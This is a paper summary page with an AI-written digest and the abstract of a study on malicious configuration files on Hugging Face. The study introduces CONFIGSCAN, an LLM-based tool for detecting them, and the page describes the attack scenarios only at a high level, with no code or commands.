🤖 AI Summary
This work addresses the security risk of malicious code execution via compromised configuration files in AI model hosting platforms (e.g., Hugging Face). We first establish a formal threat model for configuration files, systematically identifying three attack vectors: file tampering, website hijacking, and repository-level manipulation. To detect such threats, we propose CONFIGSCAN—the first detection framework for joint configuration-code analysis—integrating LLM-driven static semantic parsing, runtime dependency modeling, and critical library behavior inference. This design preserves contextual awareness while substantially reducing false positives. Evaluated on Hugging Face, CONFIGSCAN achieves >92% detection accuracy and <1.3% false positive rate, identifying thousands of high-risk configurations and repositories. Our approach advances standardization in AI model supply chain security assessment.
📝 Abstract
Recent advancements in large language models (LLMs) have spurred the development of diverse AI applications from code generation and video editing to text generation; however, AI supply chains such as Hugging Face, which host pretrained models and their associated configuration files contributed by the public, face significant security challenges; in particular, configuration files originally intended to set up models by specifying parameters and initial settings can be exploited to execute unauthorized code, yet research has largely overlooked their security compared to that of the models themselves; in this work, we present the first comprehensive study of malicious configurations on Hugging Face, identifying three attack scenarios (file, website, and repository operations) that expose inherent risks; to address these threats, we introduce CONFIGSCAN, an LLM-based tool that analyzes configuration files in the context of their associated runtime code and critical libraries, effectively detecting suspicious elements with low false positive rates and high accuracy; our extensive evaluation uncovers thousands of suspicious repositories and configuration files, underscoring the urgent need for enhanced security validation in AI model hosting platforms.